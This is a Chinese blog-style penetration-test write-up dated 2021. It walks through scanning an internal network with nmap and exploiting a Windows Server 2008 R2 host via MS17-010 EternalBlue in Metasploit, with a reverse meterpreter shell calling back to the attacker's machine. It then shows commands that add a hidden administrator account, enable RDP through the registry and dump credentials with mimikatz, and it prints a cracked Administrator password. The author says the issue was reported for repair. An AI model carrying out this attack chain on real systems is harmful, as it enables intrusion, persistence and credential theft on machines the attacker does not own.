首先用NMAP扫描的时候,扫描出一个8888端口是http协议的。
于是我把查看了 网关IP拼接端口号 丢到了浏览器访问 (IP:8888);
suoga,,,果不其然是一个Ikuai路由管理后台。
BURP前去探路,爆破无果。(五此输入错误会锁定账户)
找了CVE,,,并且尝试利用。。发现漏洞不存在,,可能(搬迁机房)已经修复。


2):服务器system权限获取
虽然拿不下路由权限,那么我们干脆换一种思路。
直接上NMAP简单的的信息收集一波,

nmap -sP 192.168.10.254/24

image1
扫描到目标机器。。

查看目标机器开放的额信息

nmap -sV 192.168.10.240

image2

可以看出这是一台 winserver2008 R2 服务器 并且开放了445端口。

那么可以尝试MS017-010攻击。

查看本机IP
Kali攻击机IP
image3

接下来我们丢出美少妇,,就是一顿梭。。。

search ms17-010

iamge4

use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.10.240
set rport 445
exploit

image5

use exploit/windows/smb/ms17_010_eternablue
set payload windows/x64/meterpreter/reverse_tcp
show options

image6

设置参数

set rhost 192.168.10.240
set lhost 192.168.4.36
set lport 4444
show options

image7


(失败)第一次 好像被动静有点大。。
服务器被打蓝屏了,,导致会话建立失败。

第二次,尝试,,会话反弹。。。
image8

WHOAMI??
image9


登录win2008服务器
添加 administered用户Cat00011cat Cat_00011_cat

windows server 2008 R2 命令行的方式如何创建用户和设置密码

windows server 2008 R2 命令行的方式如何创建用户和设置密码


windows server 2008 R2 命令行的方式如何创建用户和设置密码

一、使用命令行的方式创建用户、设置密码

打开命令提示符

net user username password / add

例如:建立一个名为Cat00011cat、密码为Cat_00011_cat 的用户

net user Cat00011cat Cat_00011_cat /add

二、使用命令行修改旧帐户的密码

net user username password

例如:将用户Cat00011cat的密码设置为Cat_00011_cat

net user Cat00011cat Cat_00011_cat 

三、使用命令行的方式创建本地组

net localgroup groupname /add

例如:添加一个名为sales的组

net localgroup sales /add

四、使用命令行的方式为本地组

net localgroup groupname username /add

例如:将用户名Cat00011cat加入到administrators组中

net localgroup administrators Cat00011cat/ add

开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /

run getgui -e //直接开启3389服务

发现用自己创建的账户并不能登录到目标主机,,
给administrator权限也不行。。
不知道啥原因。。。

最后只能load mimi拿超级管理员账号,
拿去hash解密。。

超级管理员信息:
Administrator
King2019

拿下PC

iamge10

已上报协助修复

最后修改:2021 年 05 月 26 日 05 : 08 PM